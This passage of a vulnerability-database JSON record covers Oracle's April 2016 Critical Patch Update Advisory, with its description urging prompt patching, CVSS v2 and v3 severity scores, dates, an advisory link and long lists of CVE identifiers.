"CVE-2016-0479", "CVE-2016-0659", "CVE-2016-0636", "CVE-2016-0643", "CVE-2016-3454", "CVE-2016-0672", "CVE-2016-0642", "CVE-2016-3428", "CVE-2016-3443", "CVE-2016-3460", "CVE-2016-0675", "CVE-2016-0687", "CVE-2016-0652", "CVE-2016-0640", "CVE-2016-0700", "CVE-2015-7183", "CVE-2016-0638", "CVE-2016-0408", "CVE-2016-3442", "CVE-2016-0651", "CVE-2016-3461", "CVE-2016-0673", "CVE-2016-3447", "CVE-2016-0690", "CVE-2016-0665", 
"CVE-2016-0800", "CVE-2016-0655", "CVE-2016-0657", "CVE-2016-0684", "CVE-2016-3425", "CVE-2016-0468", "CVE-2013-2566", "CVE-2016-3464", "CVE-2015-1790", "CVE-2016-0691", "CVE-2016-3438", "CVE-2016-0686", "CVE-2016-3435", "CVE-2016-3434", "CVE-2016-0654", "CVE-2016-3455", "CVE-2016-3421", "CVE-2016-3465", "CVE-2016-3439", "CVE-2016-3429", "CVE-2016-0658", "CVE-2016-0650", "CVE-2016-0644", "CVE-2016-3437", "CVE-2016-0676", "CVE-2016-0656", "CVE-2016-0667", "CVE-2016-0683", "CVE-2016-0653", "CVE-2016-0671", "CVE-2016-0661", "CVE-2016-3466", "CVE-2016-0693", "CVE-2015-7547", "CVE-2015-4923", "CVE-2016-0688", "CVE-2016-0689", "CVE-2016-0663"], "modified": "2016-12-20T00:00:00", "id": "ORACLE:CPUAPR2016V3-2985753", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T15:44:27", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to: Critical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 136 new security fixes across the product families listed below. 
Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\n**Please note that on March 23, 2016, Oracle released Security Alert for Java SE for CVE-2016-0636 . Customers of affected Oracle product(s) are strongly advised to apply the fixes that were announced for CVE-2016-0636.**\n\nPlease also note that the vulnerabilities in this Critical Patch Update are scored using versions 3.0 and 2.0 of Common Vulnerability Scoring Standard (CVSS). Future Critical Patch Updates and Security Alerts will be scored using CVSS version 3.0 only.\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available here.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-19T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2016", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4461", 
"CVE-2013-2566", "CVE-2013-4786", "CVE-2014-2532", "CVE-2014-3566", "CVE-2014-3576", "CVE-2015-1789", "CVE-2015-1790", "CVE-2015-1793", "CVE-2015-1794", "CVE-2015-2721", "CVE-2015-2808", "CVE-2015-3193", "CVE-2015-3194", "CVE-2015-3195", "CVE-2015-3196", "CVE-2015-3197", "CVE-2015-3238", "CVE-2015-3253", "CVE-2015-4000", "CVE-2015-4923", "CVE-2015-7181", "CVE-2015-7182", "CVE-2015-7183", "CVE-2015-7236", "CVE-2015-7501", "CVE-2015-7547", "CVE-2015-7575", "CVE-2016-0407", "CVE-2016-0408", "CVE-2016-0468", "CVE-2016-0469", "CVE-2016-0479", "CVE-2016-0623", "CVE-2016-0636", "CVE-2016-0638", "CVE-2016-0639", "CVE-2016-0640", "CVE-2016-0641", "CVE-2016-0642", "CVE-2016-0643", "CVE-2016-0644", "CVE-2016-0646", "CVE-2016-0647", "CVE-2016-0648", "CVE-2016-0649", "CVE-2016-0650", "CVE-2016-0651", "CVE-2016-0652", "CVE-2016-0653", "CVE-2016-0654", "CVE-2016-0655", "CVE-2016-0656", "CVE-2016-0657", "CVE-2016-0658", "CVE-2016-0659", "CVE-2016-0661", "CVE-2016-0662", "CVE-2016-0663", "CVE-2016-0665", "CVE-2016-0666", "CVE-2016-0667", "CVE-2016-0668", "CVE-2016-0669", "CVE-2016-0671", "CVE-2016-0672", "CVE-2016-0673", "CVE-2016-0674", "CVE-2016-0675", "CVE-2016-0676", "CVE-2016-0677", "CVE-2016-0678", "CVE-2016-0679", "CVE-2016-0680", "CVE-2016-0681", "CVE-2016-0682", "CVE-2016-0683", "CVE-2016-0684", "CVE-2016-0685", "CVE-2016-0686", "CVE-2016-0687", "CVE-2016-0688", "CVE-2016-0689", "CVE-2016-0690", "CVE-2016-0691", "CVE-2016-0692", "CVE-2016-0693", "CVE-2016-0694", "CVE-2016-0695", "CVE-2016-0696", "CVE-2016-0697", "CVE-2016-0698", "CVE-2016-0699", "CVE-2016-0700", "CVE-2016-0702", "CVE-2016-0705", "CVE-2016-0797", "CVE-2016-0798", "CVE-2016-0799", "CVE-2016-0800", "CVE-2016-2047", "CVE-2016-3416", "CVE-2016-3417", "CVE-2016-3418", "CVE-2016-3419", "CVE-2016-3420", "CVE-2016-3421", "CVE-2016-3422", "CVE-2016-3423", "CVE-2016-3425", "CVE-2016-3426", "CVE-2016-3427", "CVE-2016-3428", "CVE-2016-3429", "CVE-2016-3431", "CVE-2016-3434", "CVE-2016-3435", "CVE-2016-3436", 
"CVE-2016-3437", "CVE-2016-3438", "CVE-2016-3439", "CVE-2016-3441", "CVE-2016-3442", "CVE-2016-3443", "CVE-2016-3447", "CVE-2016-3449", "CVE-2016-3454", "CVE-2016-3455", "CVE-2016-3456", "CVE-2016-3457", "CVE-2016-3460", "CVE-2016-3461", "CVE-2016-3462", "CVE-2016-3463", "CVE-2016-3464", "CVE-2016-3465", "CVE-2016-3466"], "modified": "2016-12-20T00:00:00", "id": "ORACLE:CPUAPR2016V3", "href": "https://www.oracle.com/security-alerts/cpuapr2016v3.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}